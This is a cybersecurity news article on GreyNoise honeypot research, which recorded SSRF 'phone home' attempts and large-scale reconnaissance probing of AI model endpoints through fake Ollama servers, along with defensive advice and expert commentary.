Hackers Launch Over 91,000 Attacks on AI Systems Using Fake Ollama Servers – Hackread – Cybersecurity News, Data Breaches, AI, and More

Hackers Launch Over 91,000 Attacks on AI Systems Using Fake Ollama Servers – Hackread – Cybersecurity News, Data Breaches, AI, and More

In a recent discovery, researchers have found that cybercriminals are turning their focus toward the systems that power modern artificial intelligence (AI). Between October 2025 and January 2026, a specialized honeypot (a trap set by security experts to catch hackers) recorded 91,403 attack sessions.

This investigation was conducted by the research firm GreyNoise, which set up fake installations of a popular AI tool called Ollama to act as bait. The research reveals that there isn’t just one group at work, but two separate campaigns are active, each trying to find a different way to exploit the growing world of AI.

The Phone Home Trick

The first group of attackers used a method known as Server-Side Request Forgery (SSRF). To put it simply, this is a trick where a hacker fools a company’s server into making a connection to the hacker’s own computer. Researchers noted that the attackers specifically targeted Ollama and Twilio (a popular messaging service).

By sending a “malicious registry URL,” they could force the AI server to “phone home” to their own systems. It is worth noting that this activity saw a “dramatic spike over Christmas,” with 1,688 sessions occurring in just 48 hours, according to GreyNoise’s blog post. While some of these might be security researchers or bug bounty hunters looking for rewards, the timing suggests they were pushing boundaries while IT teams were on holiday.

Campaign 1 timeline (Source: GreyNoise)

Building a Hit List for AI Models

The second campaign is even more concerning. Starting on December 28, 2025, two specific digital addresses (45.88.186.70 and 204.76.203.125) began a massive, methodical search of over 73 different AI endpoints. While investigating, researchers found that in just eleven days, they generated 80,469 sessions to see which AI models they could reach.

According to researchers, these were professional actors, perhaps conducting reconnaissance since they weren’t trying to break things yet. Also, they noted the actors were “building target lists” by testing models from big names like Anthropic (Claude), Meta (Llama), xAI (Grok), and DeepSeek.

“The attack tested both OpenAI-compatible API formats and Google Gemini formats. Every major model family appeared in the probe list: OpenAI (GPT-4o and variants), Anthropic (Claude Sonnet, Opus, Haiku), Meta (Llama 3.x), DeepSeek (DeepSeek-R1), Google (Gemini), Mistral, Alibaba (Qwen), and xAI (Grok).”

GreyNoise

Further probing revealed that these attackers used simple, innocent questions like “How many states are there in the United States?” just to see which models would respond.

Hackers Launch Over 91,000 Attacks on AI Systems Using Fake Ollama Servers – Hackread – Cybersecurity News, Data Breaches, AI, and More
Campaign 2 test queries (source: GreyNoise)

How to Protect Your Systems

To keep these systems secure, researchers at GreyNoise suggest that companies should only allow AI models to be downloaded from trusted sources. It is also important to watch out for rapid-fire requests that ask the same simple questions over and over. The scale of these attacks is massive, involving 62 source IPs across 27 countries, which is a clear sign that hackers are now mapping out their next big move.

Expert Warnings on AI Risks

Security teams are viewing these findings as an early warning of a much broader risk. Chris Hughes, VP of Security Strategy at Zenity, shared his perspective exclusively with Hackread.com, noting that while probing models is a concern, the immediate danger lies in how AI agents interact with company systems.

“While this marks the first public confirmation of attackers targeting AI systems, it certainly won’t be the last,” Hughes stated. He explained that the information gained from these probes will likely be used for future attacks. He warned that the greater risk appears when AI tools access enterprise systems or cloud environments without proper oversight.

“As attackers move from probing models to exploiting agents, organizations that focus only on model-centric security will be responding to incidents they never saw coming,” he added.

(Photo by Egor Komarov on Unsplash)





Source link